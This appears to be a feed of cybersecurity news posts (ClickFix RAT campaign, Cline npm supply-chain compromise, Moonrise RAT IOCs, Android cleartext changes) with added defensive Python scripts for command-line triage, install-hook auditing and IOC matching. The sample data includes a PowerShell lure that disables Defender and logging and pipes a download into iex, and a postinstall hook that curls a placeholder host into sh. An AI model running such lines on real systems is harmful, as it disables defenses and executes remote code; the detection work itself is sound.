Three former tech employees were indicted for allegedly stealing Google trade secrets and transferring them to Iran.
Prosecutors say the data involved Pixel Tensor processor security and cryptography. Files were copied, photographed, and concealed.
Details: https://thehackernews.com/2026/02/three-former-google-engineers-indicted.html
The FBI warns ATM βjackpottingβ caused over $20M in losses in 2025.
Since 2020, 1,900 incidents have been reported, including 700 last year. Attackers use #malware like Ploutus to bypass bank authorization via the XFS layer & trigger rapid cash-outs.
Read: https://thehackernews.com/2026/02/fbi-reports-1900-atm-jackpotting.html
A 29-year-old Ukrainian was sentenced to prison for aiding North Korea's IT job fraud scheme.
He admitted selling stolen U.S. identities through a site seized in 2024, helping overseas workers secure jobs.
Details: https://thehackernews.com/2026/02/ukrainian-national-sentenced-to-5-years.html
One in three cyber-attacks starts with a compromised employee account, pushing insurers to audit passwords, admin access, and full MFA enforcement.
Coverage now depends on proving identity risk is tightly controlled.
Why MFA gaps can cost millions: https://thehackernews.com/2026/02/identity-cyber-scores-new-metric.html
MIMICRAT, a new RAT, is spreading via compromised legitimate sites.
Hijacked services displayed fake Cloudflare checks, pushing a PowerShell command that disables logging and AV, then connects over HTTPS masked as analytics traffic.
Loader stages and 22-command toolkit: https://thehackernews.com/2026/02/clickfix-campaign-abuses-compromised.html
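The pasted one-liner is the whole ClickFix trick: the victim runs it, so there is no exploit to detect, only the command line. The scorer below is an added example, not code from the article or from the MIMICRAT campaign. It weights a command line on the traits the post describes (disabling AV and logging, then fetching a stage over HTTPS from an analytics-looking URL) plus generic ClickFix traits (hidden window, policy bypass, base64 -EncodedCommand), and it decodes an encoded command so the same rules run over the hidden payload. The rule weights, the threshold and the three sample command lines are constructed assumptions; feed it command lines from your process-creation or script-block telemetry.

```python
"""Heuristic triage of PowerShell command lines for ClickFix-style lures.

Added example, not code from the article or the campaign it describes.
Rule weights, threshold and the sample command lines are assumptions.
"""
import base64
import re

# Each rule: (name, weight, compiled regex). Weights are illustrative.
RULES = [
    ("hidden_or_bypass", 2, re.compile(
        r"-(?:w(?:indowstyle)?\s+hidden|ep\s+bypass|executionpolicy\s+bypass|nop(?:rofile)?)\b", re.I)),
    ("encoded_command", 2, re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("disable_av", 3, re.compile(r"Set-MpPreference\s+-Disable\w+", re.I)),
    ("disable_logging", 3, re.compile(
        r"(?:ScriptBlockLogging|EnableScriptBlockLogging|ModuleLogging|Clear-EventLog|wevtutil\s+cl)", re.I)),
    ("download_exec", 2, re.compile(
        r"(?:iwr|Invoke-WebRequest|irm|Invoke-RestMethod|DownloadString|DownloadFile)\b.*?"
        r"(?:\|\s*iex|Invoke-Expression)", re.I | re.S)),
    ("analytics_lookalike_url", 1, re.compile(
        r"https://[^\s\"']*(?:analytics|telemetry|metrics|collect|pixel)[^\s\"']*", re.I)),
]

ENC_RX = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded(cmdline: str) -> str:
    """Return the plaintext of a -EncodedCommand payload (UTF-16LE base64), or ''."""
    m = ENC_RX.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_cmdline(cmdline: str):
    """Score the raw command line and its decoded payload together.
    Returns (total_weight, [rule names that fired], in RULES order)."""
    texts = [t for t in (cmdline, decode_encoded(cmdline)) if t]
    hits = [name for name, _w, rx in RULES if any(rx.search(t) for t in texts)]
    total = sum(w for name, w, _rx in RULES if name in hits)
    return total, hits


def triage(cmdlines, threshold: int = 5) -> list:
    """Return the command lines at or above threshold, with index, score and hits."""
    flagged = []
    for i, line in enumerate(cmdlines):
        total, hits = score_cmdline(line)
        if total >= threshold:
            flagged.append({"index": i, "score": total, "hits": hits, "cmdline": line})
    return flagged


def _encode(ps: str) -> str:
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed samples: one lure in the style the post describes, one benign
# admin task, and one lure that hides the same fetch behind -enc.
SAMPLE_CMDLINES = [
    'powershell -w hidden -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true; '
    'Set-ItemProperty HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging '
    'EnableScriptBlockLogging 0; iwr https://cdn.example.net/analytics/collect.js -UseBasicParsing | iex"',
    'powershell -NoProfile -Command "Get-Service -Name Spooler | Restart-Service"',
    "powershell -enc " + _encode("iwr https://cdn.example.net/metrics/p.js | iex"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_CMDLINES):
        print(f'[{f["score"]}] {", ".join(f["hits"])}\n    {f["cmdline"][:120]}')
```

The decoding step matters more than any single pattern: on the raw text the third sample only trips the encoded-command rule, and it is the decoded payload that supplies the download-and-execute and lookalike-URL hits that push it over the threshold. Treat the score as a triage aid, not a verdict; `-NoProfile` alone is common in legitimate automation and scores well below the line.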
WARNING: Cline CLI was silently altered for 8 hours after a stolen npm token was used to publish v2.3.0 with a hidden postinstall script that installed OpenClaw.
Roughly 4,000 downloads occurred before the release was pulled & the token revoked.
Read: https://thehackernews.com/2026/02/cline-cli-230-supply-chain-attack.html
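A stolen publish token plus a postinstall hook is enough to execute code on every machine that installs the package, which makes "which of my dependencies run install-time scripts, and what do they run?" the first question to answer. The audit below is an added example, not Cline's code or anything from the article: it walks a node_modules tree (plain and @scoped packages), lists every preinstall/install/postinstall hook, and tags commands that fetch from the network, run inline node, decode base64 or change permissions. The fixture packages, their hook bodies and the marker heuristics are constructed for illustration.

```python
"""Find dependencies that get to run code when `npm install` executes.

Added example, not Cline's code or anything from the article. Package names,
hook bodies and the marker list are constructed for illustration.
"""
import json
import shutil
import tempfile
from pathlib import Path

# Lifecycle hooks npm runs while installing a dependency from the registry.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def install_scripts(manifest: dict) -> dict:
    """Return the install-time hooks declared in a parsed package.json."""
    scripts = manifest.get("scripts") or {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def suspicious_markers(command: str) -> list:
    """Crude markers of a hook doing more than a native build (assumed heuristics)."""
    low = command.lower()
    markers = []
    if "node -e" in low or "node --eval" in low:
        markers.append("inline-node")
    if any(t in low for t in ("curl ", "wget ", "http://", "https://")):
        markers.append("network")
    if "base64" in low or "atob(" in low:
        markers.append("encoded")
    if "chmod" in low or "sudo" in low:
        markers.append("permission-change")
    return markers


def audit_tree(node_modules: Path) -> list:
    """Walk node_modules (plain and @scoped packages) and report every install hook."""
    manifests = sorted(node_modules.glob("*/package.json")) + sorted(node_modules.glob("@*/*/package.json"))
    findings = []
    for pkg_json in manifests:
        try:
            manifest = json.loads(pkg_json.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue
        for hook, command in install_scripts(manifest).items():
            findings.append({
                "package": manifest.get("name", pkg_json.parent.name),
                "version": manifest.get("version", "?"),
                "hook": hook,
                "command": command,
                "markers": suspicious_markers(command),
            })
    return findings


# Constructed fixtures standing in for a real tree; none of these is a real package.
FIXTURES = {
    "build-helper": {"name": "build-helper", "version": "1.0.0",
                     "scripts": {"postinstall": "node-gyp rebuild"}},
    "plain-lib": {"name": "plain-lib", "version": "2.1.0", "scripts": {"test": "jest"}},
    "telemetry-shim": {"name": "telemetry-shim", "version": "0.0.7",
                       "scripts": {"postinstall":
                                   "node -e \"require('child_process').execSync('curl -s https://updates.example.invalid/init.sh | sh')\""}},
    "@acme/scoped-tool": {"name": "@acme/scoped-tool", "version": "3.2.1",
                          "scripts": {"preinstall": "chmod +x ./bin/tool"}},
}


def demo() -> list:
    """Write the fixtures into a throwaway node_modules, audit it, and clean up."""
    tmp = Path(tempfile.mkdtemp())
    try:
        for rel, manifest in FIXTURES.items():
            d = tmp / "node_modules" / rel
            d.mkdir(parents=True)
            (d / "package.json").write_text(json.dumps(manifest), encoding="utf-8")
        return audit_tree(tmp / "node_modules")
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    import sys
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    for f in (audit_tree(target) if target else demo()):
        flag = " <- review" if f["markers"] else ""
        print(f'{f["package"]}@{f["version"]} {f["hook"]}: {f["command"]}{flag}')
```

Run it with a path to a real node_modules to audit a project. The blunt mitigation is `npm ci --ignore-scripts` (or `npm config set ignore-scripts true`), which would have stopped the Cline payload outright, but it also skips legitimate native builds such as node-gyp, so pair it with an allow-list of packages whose hooks you have reviewed. A new hook appearing in a package that previously had none is the diff worth alerting on.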
WARNING: A 9.9-rated Roundcube RCE flaw is now on CISA's KEV list after confirmed active exploitation.
Researchers say attackers diffed and weaponized the bug within 48 hours. An exploit was reportedly offered for sale in June 2025.
The issue lived in the code for more than 10 years.
A second XSS flaw is also being abused.
Read: https://thehackernews.com/2026/02/cisa-adds-two-actively-exploited.html
Anthropic is rolling out Claude Code Security, an AI tool that scans full codebases and suggests patches.
In limited preview for Enterprise and Team users, it analyzes code like a human, traces data flows, and reduces false positives in a review dashboard.
All fixes require human approval.
Learn how it works: https://thehackernews.com/2026/02/anthropic-launches-claude-code-security.html
Generative AI traffic is up 890%, and 87% of organizations report AI-driven attacks.
EC-Council has launched four AI certifications plus Certified CISO v4 to help teams handle adoption, security, and governance as AI risk grows.
Framework and certification details: https://thehackernews.com/2026/02/ec-council-expands-ai-certification.html
A financially driven actor breached 600+ FortiGate devices across 55 countries using commercial AI.
No zero-days. They scanned exposed management ports, brute-forced weak logins, accessed VPNs, ran DCSync in AD, and targeted Veeam backups.
Details here: https://thehackernews.com/2026/02/ai-assisted-threat-actor-compromises.html
Android 17 beta blocks cleartext traffic by default.
Apps targeting 17+ must define a Network Security Configuration; usesCleartextTraffic="true" alone won't allow HTTP. Google also adds HPKE hybrid cryptography for stronger app communications.
Read: https://thehackernews.com/2026/02/threatsday-bulletin-openssl-rce-foxit-0.html#privacy-model-hardening
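The practical consequence is that an app which only set android:usesCleartextTraffic="true" in its manifest needs an explicit network_security_config.xml, and the config should scope any remaining HTTP to named hosts rather than re-opening it globally. The linter below is an added example, not Google's code or anything from the article: it parses a constructed manifest and config, resolves whether a given host may use cleartext (most specific domain-config wins, then base-config, then the platform default of "false" that has applied since Android 9), and reports the two findings a reviewer cares about: the legacy flag used without a config, and a base-config that permits cleartext everywhere. The Android 17 rule from the post is emitted as a finding rather than looked up by API level, since the level is not given here. The manifests, the config and the hostnames are constructed.

```python
"""Lint an Android app's cleartext (plain HTTP) policy.

Added example, not Google's code or code from the article. Uses only the
long-standing Network Security Configuration elements (base-config,
domain-config, includeSubdomains). Inputs below are constructed.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest that only flips the legacy flag (not enough on Android 17+).
WEAK_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.app">
  <application android:usesCleartextTraffic="true" />
</manifest>"""

# Constructed manifest that points at an explicit config instead.
FIXED_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.app">
  <application android:networkSecurityConfig="@xml/network_security_config" />
</manifest>"""

# Constructed config: HTTPS everywhere except one named legacy host (no subdomains).
FIXED_NSC = """<network-security-config>
  <base-config cleartextTrafficPermitted="false" />
  <domain-config cleartextTrafficPermitted="true">
    <domain includeSubdomains="false">legacy.intranet.example</domain>
  </domain-config>
</network-security-config>"""


def _flag(value, default):
    """Parse an XML boolean attribute, falling back to default when absent."""
    return default if value is None else value.strip().lower() == "true"


def permits_cleartext(nsc_xml: str, host: str) -> bool:
    """Resolve cleartext for one host: the most specific matching domain-config
    wins, else base-config, else the platform default (false since Android 9)."""
    root = ET.fromstring(nsc_xml)
    host = host.lower()
    best_len, best = -1, None
    for dc in root.iter("domain-config"):        # nested domain-configs are treated flat here
        for d in dc.findall("domain"):
            name = (d.text or "").strip().lower()
            subs = _flag(d.get("includeSubdomains"), False)
            if (host == name or (subs and host.endswith("." + name))) and len(name) > best_len:
                best_len, best = len(name), _flag(dc.get("cleartextTrafficPermitted"), None)
    base = root.find("base-config")
    base_val = _flag(base.get("cleartextTrafficPermitted"), False) if base is not None else False
    return base_val if best is None else best


def cleartext_policy(manifest_xml: str, nsc_xml: str = "") -> dict:
    """Summarise the app's cleartext posture and list what a reviewer should fix."""
    app = ET.fromstring(manifest_xml).find("application")
    manifest_flag = _flag(app.get(ANDROID_NS + "usesCleartextTraffic"), False)
    declares_nsc = app.get(ANDROID_NS + "networkSecurityConfig") is not None
    findings, cleartext_domains, global_cleartext = [], [], False
    if manifest_flag and not declares_nsc:
        findings.append('usesCleartextTraffic="true" without a Network Security Configuration: '
                        "not honoured on Android 17+, so declare a config and scope HTTP to named domains")
    if nsc_xml:
        root = ET.fromstring(nsc_xml)
        base = root.find("base-config")
        global_cleartext = base is not None and _flag(base.get("cleartextTrafficPermitted"), False)
        for dc in root.iter("domain-config"):
            if _flag(dc.get("cleartextTrafficPermitted"), False):
                cleartext_domains += [(d.text or "").strip() for d in dc.findall("domain")]
        if global_cleartext:
            findings.append("base-config permits cleartext for every host; move HTTP into domain-config entries")
    return {"manifest_flag": manifest_flag, "declares_nsc": declares_nsc,
            "global_cleartext": global_cleartext, "cleartext_domains": cleartext_domains,
            "findings": findings}


if __name__ == "__main__":
    for label, args in (("weak", (WEAK_MANIFEST,)), ("fixed", (FIXED_MANIFEST, FIXED_NSC))):
        print(label, cleartext_policy(*args))
    print("legacy host:", permits_cleartext(FIXED_NSC, "legacy.intranet.example"))
    print("api host:", permits_cleartext(FIXED_NSC, "api.example.com"))
```

Two details are worth keeping in mind when reading the output. The manifest flag has been ignored whenever a networkSecurityConfig is present since the feature was introduced, so the config, not the flag, is the thing to review. And includeSubdomains="false" means the exception really is one host: sub.legacy.intranet.example falls back to base-config and is denied, which is the narrow scoping the Android 17 change is pushing apps toward.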
Iran's MuddyWater launched Operation Olalampo on Jan 26, 2026, targeting organizations across MENA.
Group-IB says phishing Office macros drop new malware: GhostFetch, GhostBackDoor, HTTP_VIP, and the Rust backdoor CHAR.
Some variants use Telegram for control, with signs of AI-assisted development.
Read: https://thehackernews.com/2026/02/muddywater-targets-mena-organizations.html
Microsoft says a Copilot bug (CW1226324) let Microsoft 365 Copilot summarize confidential emails, bypassing DLP policies.
Since Jan 21, 2026, emails in Sent Items and Drafts with sensitivity labels were processed in Copilot Chat without permission.
Microsoft fixed the issue on Feb 3 but hasn't disclosed impact.
Details: https://thehackernews.com/2026/02/threatsday-bulletin-openssl-rce-foxit-0.html#copilot-bypassed-dlp-safeguards
Researchers found 19 malicious npm packages spreading SANDWORM_MODE.
The worm steals npm/GitHub tokens, SSH keys, API secrets, and crypto keys, then propagates using stolen identities. It also injects into AI coding tools to harvest LLM API keys.
Read: https://thehackernews.com/2026/02/malicious-npm-packages-harvest-crypto.html
The real risk in enterprise AI isn't the model; it's the endpoint.
Every new LLM API, dashboard, or connector expands the attack surface. Many were built fast, not secure. Exposed endpoints can leak data or inherit powerful service account access.
Why endpoint privilege now matters in LLM stacks: https://thehackernews.com/2026/02/how-exposed-endpoints-increase-risk.html
The threat curve keeps climbing.
- Store skimmers
- WP RAT chains
- 508 ICS alerts
- 30Tbps DDoS
- Bot surge
- 2.5K Docker malware
- 1T scam ads
- NPM gambling backdoor
- Samsung fingerprinting
- Teams spoof shield
Full Weekly Recap live: https://thehackernews.com/2026/02/weekly-recap-double-tap-skimmers.html
WARNING: A new Go-based RAT, #Moonrise, evades AVs and escalates from one infected endpoint to network-wide compromise.
The impact includes credential theft and hidden audio/video surveillance.
Protect your company with strong early detection: https://thn.news/enterprise-sec
Forwarded from ANY.RUN
Update Your Detection Rules: New Remote Access Trojan
We caught a Go-based RAT and named it #Moonrise. At the time of the analysis, the sample had not yet been submitted to VirusTotal.
The level of access enables credential harvesting, sensitive data collection, and preparation for further compromise without triggering static detections, leaving SOCs with no clear signals to act on.
Observed capabilities include:
- Privilege-related functions and persistence mechanisms
- Data theft and credential harvesting
- Process control and command execution
- File upload and execution
- User activity monitoring: screen capture and streaming, webcam and microphone access, keystroke logging, clipboard monitoring
One compromised endpoint can disrupt operations and lead to financial and reputational damage.
See sample execution in a live analysis session
Behavior-first triage in #ANYRUN Sandbox lets security teams confirm attacker actions, like remote command execution, UAC bypass attempts, and persistence-related activity, within minutes. Security teams reduce Tier-1 overload and unnecessary escalations, while containing incidents earlier.
Equip your SOC with faster decisions and lower workload. See how ANY.RUN fits your workflows
#ExploreWithANYRUN
IOCs:
193[.]23[.]199[.]88
c7fd265b23b2255729eed688a211f8c3bd2192834c00e4959d1f17a0b697cd5e
8a422b8c4c6f9a183848f8d3d95ace69abb870549b593c080946eaed9e5457ad
7609c7ab10f9ecc08824db6e3c3fa5cbdd0dff2555276e216abe9eebfb80f59b
Ed5471d42bef6b32253e9c1aba49b01b8282fd096ad0957abcf1a1e27e8f7551
082fdd964976afa6f9c5d8239f74990b24df3dfa0c95329c6e9f75d33681b9f4
8d7c1bbdb6a8bf074db7fc1185ffd59af0faffb08e0eb46a373c948147787268
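An IOC list in a chat post is only useful once it is machine-readable: the IP is defanged with `[.]`, and one of the SHA-256 digests is written with an uppercase first character, which a case-sensitive lookup would silently miss. The script below is an added example, not ANY.RUN's code: it parses the list exactly as published above, refangs and lowercases it, then matches the result against in-memory samples, a directory of files, and constructed firewall-style connection lines. The log format, the sample bytes and the benign addresses are assumptions; the IOC text itself is copied from the post.

```python
"""Make the Moonrise IOC list actionable: parse, normalise, match.

Added example, not ANY.RUN's code. IOC_TEXT is copied from the post above;
the log lines, sample bytes and directory scan are constructed/assumed.
"""
import hashlib
import re
from pathlib import Path

# Copied verbatim from the post (one digest deliberately keeps its uppercase 'E').
IOC_TEXT = """193[.]23[.]199[.]88
c7fd265b23b2255729eed688a211f8c3bd2192834c00e4959d1f17a0b697cd5e
8a422b8c4c6f9a183848f8d3d95ace69abb870549b593c080946eaed9e5457ad
7609c7ab10f9ecc08824db6e3c3fa5cbdd0dff2555276e216abe9eebfb80f59b
Ed5471d42bef6b32253e9c1aba49b01b8282fd096ad0957abcf1a1e27e8f7551
082fdd964976afa6f9c5d8239f74990b24df3dfa0c95329c6e9f75d33681b9f4
8d7c1bbdb6a8bf074db7fc1185ffd59af0faffb08e0eb46a373c948147787268"""

SHA256_RX = re.compile(r"^[0-9a-fA-F]{64}$")
IPV4_RX = re.compile(r"^\d{1,3}(?:(?:\[\.\]|\.)\d{1,3}){3}$")
DST_RX = re.compile(r"\bdst=(\d{1,3}(?:\.\d{1,3}){3})")


def refang(token: str) -> str:
    """Undo common defanging: 193[.]23[.]199[.]88 -> 193.23.199.88, hxxp -> http."""
    return token.replace("[.]", ".").replace("(.)", ".").replace("hxxp", "http")


def parse_iocs(text: str) -> dict:
    """Split a pasted IOC list into refanged IPv4 addresses and lowercase SHA-256 digests."""
    ips, hashes = set(), set()
    for raw in text.splitlines():
        tok = raw.strip()
        if not tok:
            continue
        if IPV4_RX.match(tok):
            ips.add(refang(tok))
        elif SHA256_RX.match(tok):
            hashes.add(tok.lower())
    return {"ips": ips, "sha256": hashes}


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def match_samples(samples: dict, hashes: set) -> list:
    """samples: name -> bytes. Return the names whose SHA-256 is in the IOC set."""
    return sorted(name for name, data in samples.items() if sha256_bytes(data) in hashes)


def scan_directory(root: Path, hashes: set) -> list:
    """Hash every regular file under root (streamed, so large files are fine) and return hits."""
    hits = []
    for p in root.rglob("*"):
        if p.is_file():
            h = hashlib.sha256()
            with p.open("rb") as f:
                for chunk in iter(lambda: f.read(1 << 20), b""):
                    h.update(chunk)
            if h.hexdigest() in hashes:
                hits.append(str(p))
    return hits


def match_connections(log_lines, ips: set) -> list:
    """Return (line_number, dst) for lines whose destination address is an IOC."""
    return [(i, m.group(1)) for i, line in enumerate(log_lines, 1)
            if (m := DST_RX.search(line)) and m.group(1) in ips]


# Constructed firewall-style lines; 203.0.113.0/24 and 10/8 are documentation/private ranges.
SAMPLE_LOG = [
    "2026-02-20T09:12:44Z action=allow src=10.20.4.17 dst=203.0.113.10 dport=443 proto=tcp",
    "2026-02-20T09:13:02Z action=allow src=10.20.4.17 dst=193.23.199.88 dport=443 proto=tcp",
    "2026-02-20T09:13:05Z action=allow src=10.20.4.31 dst=10.20.0.5 dport=445 proto=tcp",
]

if __name__ == "__main__":
    iocs = parse_iocs(IOC_TEXT)
    print(len(iocs["ips"]), "ip(s),", len(iocs["sha256"]), "hash(es)")
    print("connections to IOC addresses:", match_connections(SAMPLE_LOG, iocs["ips"]))
```

Point `scan_directory` at a quarantine or download folder to check files against the six digests; hashes only catch the exact samples analysed, so treat the IP as the more durable indicator and feed it to your egress logs via `match_connections`, keeping in mind that a shared hosting address can also carry unrelated traffic.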
Researchers uncovered a cryptojacking campaign hiding in pirated software bundles. It drops a custom XMRig miner and abuses a flawed driver (CVE-2020-14979) to boost hashrate by 15-50%.
It can spread via USB drives, even into air-gapped systems.
Details: https://thehackernews.com/2026/02/wormable-xmrig-campaign-uses-byovd.html
Russia-linked APT28 ran a campaign across Europe from Sept 2025 to Jan 2026.
A Word doc acted as a silent beacon: opening it pinged a webhook, confirming the target engaged. From there, basic VBScript and batch files set persistence and funneled command output back via Edge.
Read: https://thehackernews.com/2026/02/apt28-targeted-european-entities-using.html
Anthropic says it blocked 16 million+ exchanges tied to model distillation campaigns targeting Claude.
The activity used 24,000 fake accounts and proxy networks to extract coding, reasoning, and tool-use capabilities. Three China-based AI labs were attributed.
Anthropic warns stripped safeguards could pose national security risks.
Read: https://thehackernews.com/2026/02/anthropic-says-chinese-ai-firms-used-16.html